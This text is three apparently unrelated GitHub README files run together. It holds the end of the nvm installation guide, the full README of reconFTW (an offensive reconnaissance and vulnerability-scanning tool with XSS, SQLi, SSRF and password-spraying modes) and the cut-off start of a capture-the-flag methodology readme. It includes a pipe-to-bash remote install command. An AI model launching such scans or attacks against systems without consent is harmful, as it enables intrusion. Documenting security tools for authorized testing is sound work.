binutils findutils curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash ``` _Note: Alpine 3.5 can only install NodeJS versions up to v6.9.5, Alpine 3.6 can only install versions up to v6.10.3, Alpine 3.7 installs versions up to v8.9.3, Alpine 3.8 installs versions up to v8.14.0, Alpine 3.9 installs versions up to v10.19.0, Alpine 3.10 installs versions up to v10.24.1, Alpine 3.11 installs versions up to v12.22.6, Alpine 3.12 installs versions up to v12.22.12, Alpine 3.13 & 3.14 install versions up to v14.20.0, Alpine 3.15 & 3.16 install versions up to v16.16.0 (**These are all versions on the main branch**). Alpine 3.5 - 3.12 required the package `python2` to build NodeJS, as they are older versions to build. Alpine 3.13+ requires `python3` to successfully build newer NodeJS versions, but you can use `python2` with Alpine 3.13+ if you need to build versions of node supported in Alpine 3.5 - 3.15, you just need to specify what version of NodeJS you need to install in the package install script._ The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). <a id="removal"></a> ## Uninstalling / Removal ### Manual Uninstall To remove `nvm` manually, execute the following: ```sh $ rm -rf "$NVM_DIR" ``` Edit `~/.bashrc` (or other shell resource config) and remove the lines below: ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` ## Docker For Development Environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 18.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -h nvm-dev -it nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to run `nvm cache clear` to delete cached node downloads, or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/nvm-sh/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/nvm-sh/nvm/issues/658)) ## macOS Troubleshooting **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). **nvm is not compatible with the npm config "prefix" option** Some solutions for this issue can be found [here](https://github.com/nvm-sh/nvm/issues/1245) There is one more edge case causing this issue, and that's a **mismatch between the `$HOME` path and the user's home directory's actual name**. You have to make sure that the user directory name in `$HOME` and the user directory name you'd see from running `ls /Users/` **are capitalized the same way** ([See this issue](https://github.com/nvm-sh/nvm/issues/2261)). To change the user directory and/or account name follow the instructions [here](https://support.apple.com/en-us/HT201548) [1]: https://github.com/nvm-sh/nvm.git [2]: https://github.com/nvm-sh/nvm/blob/v0.39.3/install.sh [3]: https://app.travis-ci.com/nvm-sh/nvm [4]: https://github.com/nvm-sh/nvm/releases/tag/v0.39.3 [Urchin]: https://git.sdf.org/tlevine/urchin [Fish]: https://fishshell.com **Homebrew makes zsh directories unsecure** ```shell zsh compinit: insecure directories, run compaudit for list. Ignore insecure directories and continue [y] or abort compinit [n]? y ``` Homebrew causes insecure directories like `/usr/local/share/zsh/site-functions` and `/usr/local/share/zsh`. This is **not** an `nvm` problem - it is a homebrew problem. Refer [here](https://github.com/zsh-users/zsh-completions/issues/680) for some solutions related to the issue. **Macs with M1 chip** Experimental support for the M1 architecture was added in node.js v15.3 and full support was added in v16.0. Because of this, if you try to install older versions of node as usual, you will probably experience either compilation errors when installing node or out-of-memory errors while running your code. So, if you want to run a version prior to v16.0 on an M1 Mac, it may be best to compile node targeting the `x86_64` Intel architecture so that Rosetta 2 can translate the `x86_64` processor instructions to ARM-based Apple Silicon instructions. Here's what you will need to do: - Install Rosetta, if you haven't already done so ```sh $ softwareupdate --install-rosetta ``` You might wonder, "how will my M1 Mac know to use Rosetta for a version of node compiled for an Intel chip?". If an executable contains only Intel instructions, macOS will automatically use Rosetta to translate the instructions. - Open a shell that's running using Rosetta ```sh $ arch -x86_64 zsh ``` Note: This same thing can also be accomplished by finding the Terminal or iTerm App in Finder, right clicking, selecting "Get Info", and then checking the box labeled "Open using Rosetta". Note: This terminal session is now running in `zsh`. If `zsh` is not the shell you typically use, `nvm` may not be `source`'d automatically like it probably is for your usual shell through your dotfiles. If that's the case, make sure to source `nvm`. ```sh $ source "${NVM_DIR}/nvm.sh" ``` - Install whatever older version of node you are interested in. Let's use 12.22.1 as an example. This will fetch the node source code and compile it, which will take several minutes. ```sh $ nvm install v12.22.1 --shared-zlib ``` Note: You're probably curious why `--shared-zlib` is included. There's a bug in recent versions of Apple's system `clang` compiler. If one of these broken versions is installed on your system, the above step will likely still succeed even if you didn't include the `--shared-zlib` flag. However, later, when you attempt to `npm install` something using your old version of node.js, you will see `incorrect data check` errors. If you want to avoid the possible hassle of dealing with this, include that flag. For more details, see [this issue](https://github.com/nodejs/node/issues/39313) and [this comment](https://github.com/nodejs/node/issues/39313#issuecomment-902395576) - Exit back to your native shell. ```sh $ exit $ arch arm64 ``` Note: If you selected the box labeled "Open using Rosetta" rather than running the CLI command in the second step, you will see `i386` here. Unless you have another reason to have that box selected, you can deselect it now. - Check to make sure the architecture is correct. `x64` is the abbreviation for `x86_64`, which is what you want to see. ```sh $ node -p process.arch x64 ``` Now you should be able to use node as usual. ## WSL Troubleshooting If you've encountered this error on WSL-2: ```sh curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: raw.githubusercontent.com ``` It may be due to your antivirus, VPN, or other reasons. Where you can `ping 8.8.8.8` while you can't `ping google.com` This could simply be solved by running this in your root directory: ```sh sudo rm /etc/resolv.conf sudo bash -c 'echo "nameserver 8.8.8.8" > /etc/resolv.conf' sudo bash -c 'echo "[network]" > /etc/wsl.conf' sudo bash -c 'echo "generateResolvConf = false" >> /etc/wsl.conf' sudo chattr +i /etc/resolv.conf ``` This deletes your `resolv.conf` file thats automatically generated when u run WSL, creates a new file and puts `nameserver 8.8.8.8`, then creates a `wsl.conf` file and adds `[network]` and `generateResolveConf = false` to prevent auto generation of that file. You can check the contents of the file by running: ```sh cat /etc/resolv.conf ``` ## Maintainers Currently, the sole maintainer is [@ljharb](https://github.com/ljharb) - more maintainers are quite welcome, and we hope to add folks to the team over time. [Governance](./GOVERNANCE.md) will be re-evaluated as the project evolves. ## License See [LICENSE.md](./LICENSE.md). ## Copyright notice Copyright [OpenJS Foundation](https://openjsf.org) and `nvm` contributors. All rights reserved. The [OpenJS Foundation](https://openjsf.org) has registered trademarks and uses trademarks. For a list of trademarks of the [OpenJS Foundation](https://openjsf.org), please see our [Trademark Policy](https://trademark-policy.openjsf.org/) and [Trademark List](https://trademark-list.openjsf.org/). Node.js is a trademark of Joyent, Inc. and is used with its permission. Trademarks and logos not indicated on the [list of OpenJS Foundation trademarks](https://trademark-list.openjsf.org) are trademarks™ or registered® trademarks of their respective holders. Use of them does not imply any affiliation with or endorsement by them. [The OpenJS Foundation](https://openjsf.org/) | [Terms of Use](https://terms-of-use.openjsf.org/) | [Privacy Policy](https://privacy-policy.openjsf.org/) | [OpenJS Foundation Bylaws](https://bylaws.openjsf.org/) | [Trademark Policy](https://trademark-policy.openjsf.org/) | [Trademark List](https://trademark-list.openjsf.org/) | [Cookie Policy](https://www.linuxfoundation.org/cookies/)
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.1.1"> <img src="https://img.shields.io/badge/release-v2.1.1-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/telegram-@ReconFTW-blue.svg"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker container 🐳 (2 options)](#b-docker-container--2-options) - [1) From DockerHub](#1-from-dockerhub) - [2) From repository](#2-from-repository) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [You can support this work buying me a coffee:](#you-can-support-this-work-buying-me-a-coffee) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker container 🐳 (2 options) - Docker parameters usage ``` bash -d -> Detached -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -> Share CFG with the Docker -v $PWD/Recon/:/root/Tools/reconftw/Recon/ -> Share output folder with the Host --name reconftwSCAN -> Docker name --rm -> Automatically remove the container when it exits '-d target.com -r' -> reconftw parameters ``` ### 1) From [DockerHub](https://hub.docker.com/r/six2dez/reconftw) ```bash docker pull six2dez/reconftw:main # Download and configure CFG file wget https://raw.githubusercontent.com/six2dez/reconftw/main/reconftw.cfg mkdir Recon docker run -d -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm six2dez/reconftw:main -d target.com -r ``` ### 2) From repository ```bash git clone https://github.com/six2dez/reconftw cd reconftw docker build -t reconftw Docker/. # Running from reconftw root folder, configure values properly for your needs docker run -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm reconftw -d target.com -r ``` # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) update_resolvers=true proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/notify.conf # No need to define #SUBFINDER_CONFIG=~/.config/subfinder/config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #UDORK_COOKIE="c_user=XXXXXXXXXX; xs=XXXXXXXXXXXXXX" #SHODAN_API_KEY="XXXXXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #findomain_virustotal_token="XXXXXXXXXXXXXXXXX" #findomain_spyse_token="XXXXXXXXXXXXXXXXX" #findomain_securitytrails_token="XXXXXXXXXXXXXXXXX" #findomain_fb_token="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true GOOGLE_DORKS=true GITHUB_DORKS=true METADATA=true EMAILS=true DOMAIN_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CLOUD_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=50 GITDORKER_THREADS=5 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 ARJUN_THREADS=20 GAUPLUS_THREADS=10 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 WEBSCREENSHOT_THREADS=200 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) AXIOM=false AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=10 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME=user BBRF_PASSWORD=password # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' yellow='\033[0;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information parser ([domainbigdata](https://domainbigdata.com/)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester), [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([uDork](https://github.com/m3n0sd0n4ld/uDork)) - Github Dorks ([GitDorker](https://github.com/obheda12/GitDorker)) ## Subdomains - Passive ([subfinder](https://github.com/projectdiscovery/subfinder), [assetfinder](https://github.com/tomnomnom/assetfinder), [amass](https://github.com/OWASP/Amass), [findomain](https://github.com/Findomain/Findomain), [crobat](https://github.com/cgboal/sonarsearch), [waybackurls](https://github.com/tomnomnom/waybackurls), [github-subdomains](https://github.com/gwen001/github-subdomains), [Anubis](https://jldc.me), [gauplus](https://github.com/bp0lr/gauplus)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr), [tls.bufferover](tls.bufferover.run) and [dns.bufferover](dns.bufferover.run))) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dnsrecon](https://github.com/darkoperator/dnsrecon)) ## Hosts - IP and subdomains WAF checker ([cf-check](https://github.com/dwisiswant0/cf-check) and [wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [shodan-cli](https://cli.shodan.io/), Subdomains IP resolution with[resolveDomains](https://github.com/Josue87/resolveDomains)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) - Cloud providers check ([clouddetect](https://github.com/99designs/clouddetect)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gauplus](https://github.com/bp0lr/gauplus), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [LinkFinder](https://github.com/GerbenJavado/LinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - S3 bucket finder ([S3Scanner](https://github.com/sa7mon/S3Scanner)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## You can support this work buying me a coffee: [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [Spyse](https://spyse.com/) - [Networksdb](https://networksdb.io/) - [Intelx](https://intelx.io/) - [BinaryEdge](https://www.binaryedge.io/) - [Censys](https://censys.io/) - [CIRCL](https://www.circl.lu/) - [Whoxy](https://www.whoxy.com/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
# 📖 ReadMe [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) <a name="contents"></a> ## 🔖 Contents - ☀️ [Methodology](#methodology) * ⚙️ [Phase 0: Recon](#mrecon) * ⚙️ [Phase 1: Enumerate](#menumerate) * ⚙️ [Phase 2: Exploit](#mexploit) * ⚙️ [Phase 3: PrivEsc](#mprivesc) - ☀️ [Stats](#stats) * 📊 [Counts](#counts) * 📊 [Top Categories](#topcategories) * 📊 [Top Ports/Protocols/Services](#topportsprotocolsservices) * 📊 [Top TTPs](#topttps) - ⚡ [Mapping](#mapping) - 💥 [Machines](#machines) - ☢️ [TTPs](#ttps) * ⚙️ [Enumerate](#enumerate) * ⚙️ [Exploit](#exploit) * ⚙️ [PrivEsc](#privesc) - ⚡ [Tips](#tips) - 💥 [Tools](#tools) - 🔥 [Loot](#loot) * 🔑 [Credentials](#credentials) * 🔑 [Hashes](#hashes) <a name="methodology"></a> ## ☀️ Methodology [↟](#contents) <a name="mrecon"></a> ### ⚙️ Phase #0: Recon [🡑](#methodology) **Goal**: to scan all ports on &lt;targetip&gt; **Process**: * [enumerate_nmap_initial](#enumerate_nmap_initial) * [enumerate_nmap_tcp](#enumerate_nmap_tcp) * [enumerate_nmap_udp](#enumerate_nmap_udp) <a name="menumerate"></a> ### ⚙️ Phase #1: Enumerate [🡑](#methodology) **Goal**: to find service and version details **Process**: * find ttps for 